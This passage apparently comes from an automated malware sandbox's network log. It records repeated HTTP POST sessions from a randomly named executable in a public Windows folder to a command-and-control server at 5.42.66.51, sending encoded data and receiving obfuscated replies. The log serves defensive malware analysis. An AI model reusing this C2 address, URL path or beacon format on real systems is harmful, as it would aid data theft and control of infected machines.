                                                                                                Oct 11, 2024 20:37:49.316576004 CEST2472OUTData Raw: 32 70 6b 69 75 62 54 58 7a 6c 67 2b 33 42 79 71 49 4f 72 34 38 64 6b 62 45 68 4e 45 74 7a 68 4d 2f 65 50 39 39 38 4b 48 43 49 34 74 70 31 50 6d 4a 57 2f 78 65 32 31 47 52 6d 6f 6b 39 78 74 52 67 74 31 46 50 68 74 2b 44 7a 76 4f 69 39 50 4c 5a 4f
                                                                                                Data Ascii: 2pkiubTXzlg+3ByqIOr48dkbEhNEtzhM/eP998KHCI4tp1PmJW/xe21GRmok9xtRgt1FPht+DzvOi9PLZOoGjTcMur22nrcOBsCkXIv1hCOSp+ouHeomK3roni0v1cZNz9rvwz6ZcdveVJWMFjYjOFNLJpCXcZiNu4060LpY0qMyAbdRJy4YBOKacJEyhmrpECqkLCXqLV43Uj/f8FSR1MkQfVRcMnrIUjkybfowuSKKU7M8sTd
                                                                                                Oct 11, 2024 20:37:49.316629887 CEST7416OUTData Raw: 57 62 58 34 75 63 74 31 63 79 59 2f 6e 35 45 4e 41 59 39 62 31 6b 4d 36 51 77 61 72 67 6e 39 78 52 41 4c 34 56 56 51 4a 2f 69 63 70 35 43 72 71 46 50 2f 39 4d 55 52 64 39 59 39 33 35 36 70 71 37 55 38 56 6d 77 5a 58 41 2f 35 69 69 76 45 62 69 74
                                                                                                Data Ascii: WbX4uct1cyY/n5ENAY9b1kM6Qwargn9xRAL4VVQJ/icp5CrqFP/9MURd9Y9356pq7U8VmwZXA/5iivEbithvA7n+ppRcWQHBHFxg3S/EWMaS1Ux1FWPCclA6gz9ePRt6E/St/+CQV8kizWietPvobySrf/NJ57/5ZDxE32LM1sMq1yyXk+VBe8BWl2FrhoNJVr5fJOyc2Bw2KwTbA/2zjPMSnncsgQHW2LGM37cVA7RA/r2qfa2
                                                                                                Oct 11, 2024 20:37:49.316699982 CEST7416OUTData Raw: 78 69 4b 34 4b 42 66 4d 7a 6e 30 4a 6c 66 48 4c 70 51 6d 4a 79 2b 62 6e 32 70 49 6e 6a 69 70 69 35 39 37 70 70 57 33 46 75 31 6c 56 44 66 5a 66 47 6a 70 47 48 6d 64 61 54 58 37 55 33 46 54 6f 49 39 79 55 4a 30 66 51 49 6d 52 79 5a 62 68 6f 72 4d
                                                                                                Data Ascii: xiK4KBfMzn0JlfHLpQmJy+bn2pInjipi597ppW3Fu1lVDfZfGjpGHmdaTX7U3FToI9yUJ0fQImRyZbhorMMxwHmudAqhZjnwrqSCOWlRpQJkZLU5Fg23PGjldAAkIQpHmQNCXKvMJlyfcaZSFNfV+3PAGYuPnkA3/aH9IDcQYB3XWDIW7qLQCjCuc/tQ+DymyMYDMbiqqrzRYI4AWOYwwNHaDtxE8kB+cOYN9fAphdxubLHkB0v
                                                                                                Oct 11, 2024 20:37:49.316862106 CEST2472OUTData Raw: 38 34 77 75 71 36 35 39 34 59 77 77 33 70 64 41 46 31 35 4d 50 6b 71 38 73 78 56 41 37 33 6c 62 56 70 76 6c 4b 2b 76 37 37 4f 44 32 64 6f 38 4c 43 68 63 6b 5a 36 75 6e 6c 35 6a 4d 61 50 4f 73 6e 65 69 47 76 34 5a 78 6b 5a 47 4a 4c 71 7a 6e 48 35
                                                                                                Data Ascii: 84wuq6594Yww3pdAF15MPkq8sxVA73lbVpvlK+v77OD2do8LChckZ6unl5jMaPOsneiGv4ZxkZGJLqznH5ePz6OtlQdSnlMU2UqbAAL7eukohBL49IT0H6mJ3HHSIrhWiPXdp/0WKcaz5vK7UHZ2KbL8ki9333bjs+/3eG58H511rxr1XqYtz5q48lSyblDUuG3Fnq37N+/LVykhN95KrVKFhbZnToe1dfPPWajZmO+m3yjnLbU
                                                                                                Oct 11, 2024 20:37:49.316901922 CEST2472OUTData Raw: 2b 32 78 38 48 66 66 4c 36 44 6d 53 6f 68 61 4e 48 76 34 31 4b 66 55 2b 74 30 44 38 31 43 49 49 77 75 71 33 68 30 6f 54 4f 4b 66 56 6c 59 36 4d 61 56 54 33 2b 36 2f 45 48 6b 4d 58 58 61 55 4a 33 4a 48 67 43 7a 31 7a 65 67 76 44 36 43 44 6a 46 6e
                                                                                                Data Ascii: +2x8HffL6DmSohaNHv41KfU+t0D81CIIwuq3h0oTOKfVlY6MaVT3+6/EHkMXXaUJ3JHgCz1zegvD6CDjFn4IgR8CU2MXJKvMrii6IaG123uTHSzrc1jguWv4bSSYYQ2XoyD7CB2AouRXqIZzJOA5lFpCXqLh9G3wvoHymyx6tIBYWNBrUmZdsC2z9xwyzXBFe2KNNE3FQbZ4vdx+wJx8X8N25hFCicWOvh8TxtmNDgIanHMY67d
                                                                                                Oct 11, 2024 20:37:49.316936970 CEST2472OUTData Raw: 62 4e 32 4e 64 72 30 58 58 72 78 30 51 58 45 6d 55 45 31 73 6a 69 43 4c 68 51 55 4f 2b 4a 39 38 31 77 34 48 4c 33 72 51 50 6b 62 63 36 6c 73 67 76 41 6c 61 75 47 2b 44 48 65 30 31 47 35 68 39 33 58 4c 6c 6c 38 44 74 56 7a 56 78 43 4e 35 50 56 56
                                                                                                Data Ascii: bN2Ndr0XXrx0QXEmUE1sjiCLhQUO+J981w4HL3rQPkbc6lsgvAlauG+DHe01G5h93XLll8DtVzVxCN5PVVO/ysbMsasmseOq7rM/r9K3y0j27GbYSG7yekfvp/oOJgl+uEC+WRhQ1dX1JWZzXjHx118MpRvrysofQpA/0upFSEvZc5qruTvxppvmFXuBM8SoKigh6C4pwg2ASMbNHfFb7/RsFN125nnil/7idjPq0Pa90sNQ0VY
                                                                                                Oct 11, 2024 20:37:49.321794033 CEST2472OUTData Raw: 73 56 5a 79 4d 49 46 39 51 41 38 4b 63 57 77 50 2f 7a 34 4a 51 4b 33 44 33 34 61 59 41 73 49 47 72 78 67 65 4a 55 30 63 2b 36 6f 52 59 79 4c 71 76 2b 36 76 64 63 33 4c 66 35 75 6d 4a 65 61 34 48 46 30 39 6f 76 2f 51 73 66 76 69 6f 6a 61 56 50 72
                                                                                                Data Ascii: sVZyMIF9QA8KcWwP/z4JQK3D34aYAsIGrxgeJU0c+6oRYyLqv+6vdc3Lf5umJea4HF09ov/QsfviojaVPr1VWsml97nlenqW/uM6m84dYlT3c9KeOA8nXRlpFVERKX6Llm0DSrvKLbOhOcqRmthGf4ERtaTSPKEesRSVGvTyHuO5EpnRcDa2nRKhA9H6w7+vjneBWPsKoqN3BTlxrqq+1F2pi7N56QRwt2xiBnsM86ePPlTDWfr
                                                                                                Oct 11, 2024 20:37:49.321894884 CEST2472OUTData Raw: 61 77 52 65 46 50 39 64 65 32 46 38 41 72 69 55 38 51 7a 69 61 2f 38 71 30 53 4b 67 4b 4f 68 57 78 61 79 34 58 4b 61 71 7a 76 59 61 32 54 74 7a 4e 51 72 55 63 34 44 6f 6c 35 63 64 6a 41 74 6f 62 62 71 4a 41 34 53 32 51 34 45 2b 58 52 37 76 56 62
                                                                                                Data Ascii: awReFP9de2F8AriU8Qzia/8q0SKgKOhWxay4XKaqzvYa2TtzNQrUc4Dol5cdjAtobbqJA4S2Q4E+XR7vVb40b3OXQtF8bT4c/NNKZiVF7yHhe4vC2oLJqG6N24fMOvtX+ik9jiHq3DEx2nQKyktGGnRvL1dzBOJOAI+xK0xKTmURbrf09Kbr6GTsBnJ1PeQ5JF4veQ1sHiHPlz8CUYEWHIY7Vg+W669WLyVHu13LSrpmaOnE1E8
                                                                                                Oct 11, 2024 20:37:49.321917057 CEST2472OUTData Raw: 77 53 78 71 2f 4e 4b 62 65 62 5a 78 49 53 2b 4a 39 30 78 2b 4a 71 55 68 79 68 32 58 69 32 4c 49 34 52 4f 6c 66 45 58 52 54 49 43 75 49 7a 59 6a 51 74 44 51 6c 4e 5a 4a 2f 65 74 78 69 53 2f 63 63 39 39 67 68 48 54 63 75 78 45 34 66 33 63 31 6c 49
                                                                                                Data Ascii: wSxq/NKbebZxIS+J90x+JqUhyh2Xi2LI4ROlfEXRTICuIzYjQtDQlNZJ/etxiS/cc99ghHTcuxE4f3c1lI4ruL47A9kDTfmSYzP2CDJAHKNHCaY6HoLmGUVBUo001a4J3pZZUtcvmYb5ZqJMQWOGh1E3ZLLzNnOZWFUWtNF9R+Dvtj5buGWE+5IWxhGwcAxNyWlVIFCSlpk58JUEcgPIZ/xlKn9zVU2bwWMo9rnc39l40DH+LuU
                                                                                                Oct 11, 2024 20:37:58.627657890 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:59.343909025 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:37:59.351190090 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:59.562632084 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:59.968358040 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.5499025.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:49.704802036 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:50.081835985 CEST2156OUTData Raw: 5c 5d 46 5a 5a 59 55 5a 54 57 5b 54 52 5f 57 56 58 50 58 55 5b 55 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \]FZZYUZTW[TR_WVXPXU[UU]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C%*<Z>+?%''6!$.07)(#-.5Z*"+9"_$,P,'
                                                                                                Oct 11, 2024 20:37:50.539520025 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:50.557661057 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:50 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 00 22 2c 2b 5f 3d 23 00 08 2f 04 36 0c 24 21 3e 17 26 16 0a 04 23 29 28 5c 3a 10 3c 0d 32 5c 2c 04 29 2f 3a 54 27 2f 33 13 27 01 2b 5d 0d 10 26 19 33 0a 2d 00 29 16 38 56 2d 58 29 00 33 07 26 5b 21 2e 24 0a 21 2d 39 5a 31 02 2f 08 26 04 25 56 28 42 31 5c 38 2c 33 16 24 2e 2f 55 0f 11 38 1e 25 01 20 13 35 5b 3f 53 20 3f 06 5c 20 11 0f 02 20 33 37 58 25 14 3b 12 31 02 39 03 3d 23 3c 0e 29 21 3d 17 26 04 3a 0d 3f 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:",+_=#/6$!>&#)(\:<2\,)/:T'/3'+]&3-)8V-X)3&[!.$!-9Z1/&%V(B1\8,3$./U8% 5[?S ?\ 37X%;19=#<)!=&:?2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.5499135.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:51.616833925 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:51.966861963 CEST2140OUTData Raw: 59 53 43 50 5a 58 50 59 54 57 5b 54 52 5e 57 51 58 51 58 5c 5b 5f 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YSCPZXPYTW[TR^WQXQX\[_U]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A39')]9=80]5C?Z80#>17%P-%>W .+"_$,P,7
                                                                                                Oct 11, 2024 20:37:52.320821047 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:52.451277971 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:52 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 00 22 2f 33 5f 28 33 21 57 38 14 2a 0f 26 0b 2e 1a 25 06 33 5d 21 14 12 5c 39 07 3b 55 26 2a 0e 04 2a 12 0b 0d 27 3f 0d 12 24 2b 2b 5d 0d 10 26 5f 33 23 3d 02 3e 28 3b 0e 3a 3e 08 59 30 00 2e 5c 23 3e 0e 0a 21 00 3a 07 24 2f 2c 56 25 03 2a 0e 29 24 0f 5b 38 2c 34 01 26 2e 2f 55 0f 11 38 54 31 06 34 5b 21 5b 30 0e 34 11 20 5f 34 06 3e 12 37 23 0a 00 32 04 06 02 27 2c 32 13 29 23 3b 1f 3d 32 0b 14 26 2a 26 0d 3f 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:"/3_(3!W8*&.%3]!\9;U&**'?$++]&_3#=>(;:>Y0.\#>!:$/,V%*)$[8,4&./U8T14[![04 _4>7#2',2)#;=2&*&?""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.5499265.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:53.494677067 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:53.841883898 CEST2156OUTData Raw: 59 52 43 5d 5f 5e 50 5e 54 57 5b 54 52 5a 57 57 58 54 58 58 5b 58 55 59 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YRC]_^P^TW[TRZWWXTXX[XUY_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.'*?>]&V?%8X$?"C?\,4Z** 8,.9=;9"_$,P,3
                                                                                                Oct 11, 2024 20:37:54.191994905 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:54.328022957 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 13 35 01 37 15 29 0d 0b 57 3b 04 0f 51 25 22 00 59 31 16 24 07 22 39 34 11 2e 2d 20 0c 25 03 33 10 2a 3c 04 53 33 01 2f 59 24 11 2b 5d 0d 10 26 19 33 33 3a 13 2a 3b 27 08 39 00 2d 01 27 10 2a 5d 35 3e 3c 08 22 3d 26 03 32 05 3b 0e 26 03 21 12 2b 1d 21 5c 2d 2c 0e 00 25 3e 2f 55 0f 11 3b 0b 25 3f 16 5e 23 2e 3f 1f 37 06 38 5f 23 3f 32 13 23 23 20 01 24 29 23 58 25 2c 2a 5e 3d 20 38 0f 2a 21 26 05 25 04 3d 55 28 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98957)W;Q%"Y1$"94.- %3*<S3/Y$+]&33:*;'9-'*]5><"=&2;&!+!\-,%>/U;%?^#.?78_#?2## $)#X%,*^= 8*!&%=U("S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.5499405.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:55.368527889 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:55.757078886 CEST2156OUTData Raw: 59 5a 43 51 5a 59 55 5b 54 57 5b 54 52 5f 57 57 58 53 58 55 5b 54 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YZCQZYU[TW[TR_WWXSXU[TUZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A3:<>+2V*5$Y3""],U$Z(;=P#-,=*=1<[/+"_$,P,'
                                                                                                Oct 11, 2024 20:37:56.080323935 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:56.212604046 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:55 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 1e 36 3c 30 01 28 33 39 54 2f 04 07 1e 26 1c 29 04 27 28 28 04 23 3a 1a 5c 2c 3e 3c 0d 25 14 2b 11 2a 3f 29 0b 33 11 28 02 25 2b 2b 5d 0d 10 26 17 33 23 2e 5a 3e 06 0e 54 2c 3e 22 5b 25 3d 3d 07 35 00 28 0b 35 00 2e 04 25 3f 2c 56 26 3d 3e 08 3c 27 2d 1e 38 3c 2b 1b 26 3e 2f 55 0f 11 3b 0a 25 11 19 06 21 3e 2f 56 23 3f 0e 1b 37 59 36 58 37 23 05 58 31 2a 02 04 26 3f 3e 1d 3d 23 2c 0f 3d 0b 39 17 26 3a 0b 55 28 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9896<0(39T/&)'((#:\,><%+*?)3(%++]&3#.Z>T,>"[%==5(5.%?,V&=><'-8<+&>/U;%!>/V#?7Y6X7#X1*&?>=#,=9&:U("S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.5499515.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:57.227875948 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:57.576585054 CEST2128OUTData Raw: 5c 5a 46 5d 5f 53 55 58 54 57 5b 54 52 5c 57 54 58 52 58 54 5b 5b 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \ZF]_SUXTW[TR\WTXRXT[[U^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.'$\*8&P>Z3Y*"%3]/ X*87>:=&)4:"_$,P,+
                                                                                                Oct 11, 2024 20:37:57.937397003 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:58.053499937 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:57 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 58 21 11 20 00 3e 0a 31 13 3b 39 3d 1c 32 0c 32 58 26 28 05 19 22 14 3c 12 2c 2e 27 54 26 29 20 03 29 02 07 0d 25 2c 33 5b 25 3b 2b 5d 0d 10 25 06 26 33 32 1c 3e 01 27 0c 2c 3d 26 59 30 3e 22 17 22 00 20 08 22 2e 3d 14 32 3f 24 53 25 2d 0f 12 29 24 04 01 2f 3f 2b 58 32 3e 2f 55 0f 11 38 11 32 2f 12 5f 35 3d 09 1f 20 11 24 58 21 3f 3e 10 20 33 3c 02 31 03 23 1f 32 2c 3d 02 3e 33 23 55 29 21 21 14 26 39 26 09 3c 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989X! >1;9=22X&("<,.'T&) )%,3[%;+]%&32>',=&Y0>"" ".=2?$S%-)$/?+X2>/U82/_5= $X!?> 3<1#2,=>3#U)!!&9&<""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.2.5499665.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:59.073103905 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:59.419977903 CEST2156OUTData Raw: 5c 59 43 5e 5f 5b 55 59 54 57 5b 54 52 58 57 5c 58 56 58 5d 5b 54 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YC^_[UYTW[TRXW\XVX][TU^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-3'>+V)6$0?2"5/U7)V#8!9>!_?!$Y-"_$,P,;
                                                                                                Oct 11, 2024 20:38:02.753798962 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:02.884623051 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 10 22 3c 3c 01 2a 1d 39 1d 3b 04 35 50 24 32 29 07 32 06 24 05 36 03 23 01 2e 3e 23 1f 32 3a 0e 04 3d 3c 00 10 30 06 2b 5a 27 3b 2b 5d 0d 10 26 5f 27 0a 31 03 2a 5e 23 0d 3a 3e 0f 07 27 58 3e 5b 21 2d 3f 51 23 3e 3e 07 25 3c 2c 56 31 03 00 08 28 1a 31 5c 2c 3c 09 5c 25 04 2f 55 0f 11 38 1c 27 3f 16 5b 21 5b 33 11 34 59 27 00 23 06 2a 58 37 23 2b 5a 26 29 30 05 25 3c 2a 58 29 1d 27 1d 29 31 35 59 25 14 00 08 28 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989"<<*9;5P$2)2$6#.>#2:=<0+Z';+]&_'1*^#:>'X>[!-?Q#>>%<,V1(1\,<\%/U8'?[![34Y'#*X7#+Z&)0%<*X)')15Y%(""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.2.5499745.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:00.193919897 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
